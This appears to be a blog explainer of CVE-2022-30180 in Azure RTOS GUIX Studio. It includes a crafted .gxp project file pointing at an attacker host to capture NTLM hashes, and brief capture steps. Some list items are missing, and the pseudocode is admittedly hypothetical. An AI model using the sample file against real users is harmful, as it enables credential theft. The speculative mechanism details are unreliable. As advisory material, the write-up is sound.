When it comes to embedded systems, security is not optional. The widely-used Azure RTOS GUIX Studio—Microsoft’s graphical user interface framework for embedded devices—has had its share of vulnerabilities. Among them, CVE-2022-30180 is an information disclosure bug that could allow an attacker to exfiltrate sensitive project details just by tricking you into opening a malicious project file.

Let’s break this down, step by step, and see a sample exploitation route.

What is CVE-2022-30180?

CVE-2022-30180 is an information disclosure vulnerability found in Microsoft’s Azure RTOS GUIX Studio (versions prior to 6.1.9). The problem comes from how GUIX Studio opens project (*.gxp) files. If the file is specially crafted, opening it could leak local information—like file paths and secrets—without user consent.

Microsoft’s Bulletin

You can read Microsoft’s advisory here:  
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30180

> *"A remote attacker could trick a user into opening a malicious project file, leading to unintentional information disclosure."*

Why Does This Matter?

GUIX Studio targets embedded device development for industries like medical, automotive, IoT, and more. Leaked information could allow attackers to:

Exfiltrate proprietary IP.

Cybersecurity in embedded is lagging behind, and vulnerabilities here have real-world consequences.

How the Bug Happens

GUIX Studio loads all referenced resource files in a *.gxp project. If one of these references is redirected (like a UNC share or an external HTTP(s) link), information about your environment (who opened the file, what resources were loaded, mapped drives, etc.) could be sent out without you realizing.

Resource reference points to an external server

5. Victim’s machine makes a request (includes local path/user info), leaking info

Here’s an example of what an attacker-controlled project.gxp could look like

<guix_project>
  <resources>
    <image name="logo" path="\\evil-attacker.com\share\logo.bmp"/>
    <font name="main" path="http://evil-attacker.com/font.ttf"/>;
  </resources>
</guix_project>

If the victim opens this file

- Windows tries to access \\evil-attacker.com\share\logo.bmp as a network share, sending the user’s NTLM hash automatically!
- The embedded HTTP resource (font.ttf) exposes the victim’s IP address, User-Agent, and possibly more.

Suppose GUIX Studio uses C or C++ pseudocode to load a project resource

// Hypothetical code snippet for illustrative purposes
FILE *fp = fopen(resource_path, "rb");
if (!fp) {
    printf("Error loading resource: %s\n", resource_path);
}
// ...proceeds to use the resource

How to Exploit (PoC)

1. Set up a server to capture SMB or HTTP/HTTPS requests.  
  (e.g., Responder for SMB, or simple Python HTTP server)
2. Create a .gxp file referencing an image/font on your server.

Real Risks and Mitigations

- Risk: Attackers with access to supply chain or file shares could use .gxp as initial infection vector.
- Mitigation: Update GUIX Studio to 6.1.9 or later. Microsoft patched this by adding resource path validation.

See patch notes here:  
https://github.com/azure-rtos/gui_studio/blob/master/CHANGELOG.md

Conclusion and Action Items

CVE-2022-30180 is a reminder: Don’t trust files you didn’t make—especially in embedded development. Review all incoming project files, audit resource links in your projects, and keep GUIX Studio up to date.

Further References

- Microsoft Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30180
- Official Patch Notes: https://github.com/azure-rtos/gui_studio/blob/master/CHANGELOG.md
- Background: https://docs.microsoft.com/en-us/azure/rtos/guix/guix-studio/

Stay safe—embedded systems are low-hanging fruit for cybercriminals. Patch, audit, and verify your toolchain!

Timeline

Published on: 06/15/2022 22:15:00 UTC
Last modified on: 06/27/2022 16:17:00 UTC